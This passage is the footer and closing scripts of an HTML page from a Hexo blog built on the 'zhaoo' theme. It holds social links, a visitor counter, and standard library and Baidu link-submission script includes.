        onMouseOver="this.style.color= '#09BB07'" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  iconwechat-fill "></i>
      </a><a 
        href="https://github.com/zhaoo "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color= '#9f7be1'" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  icongithub-fill "></i>
      </a><a 
        href="mailto:2549294026@qq.com "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color=#FF3B00" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  iconmail"></i>
      </a></div>
  
    <div class="footer-copyright"><p>Powered by <a target="_blank" href="https://hexo.io">bubble down</a>  |  Theme - <a target="_blank" href="https://github.com/izhaoo/hexo-theme-zhaoo">zhaoo</a></p></div>
  

<!-- 不蒜子统计 -->
<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<span id="busuanzi_container_site_pv">
    本站总访问量<span id="busuanzi_value_site_pv"></span>次
</span>
</footer>


  
      <div class="fab fab-plus">
    <i class="iconfont iconplus"></i>
  </div>
  
  
  
  <div class="fab fab-up">
    <i class="iconfont iconcaret-up"></i>
  </div>
  
  
  
    
<script src="/js/color-mode.js"></script>

  
  
</body>

<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>





  
<script src="https://cdn.bootcdn.net/ajax/libs/jquery.lazyload/1.9.1/jquery.lazyload.min.js"></script>




  
<script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.5.7/jquery.fancybox.min.js"></script>








<script src="/js/utils.js"></script>
<script src="/js/script.js"></script>







  <script>
    (function () {
      var bp = document.createElement('script');
      var curProtocol = window.location.protocol.split(':')[0];
      if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
      } else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
      }
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(bp, s);
    })();
  </script>













</html>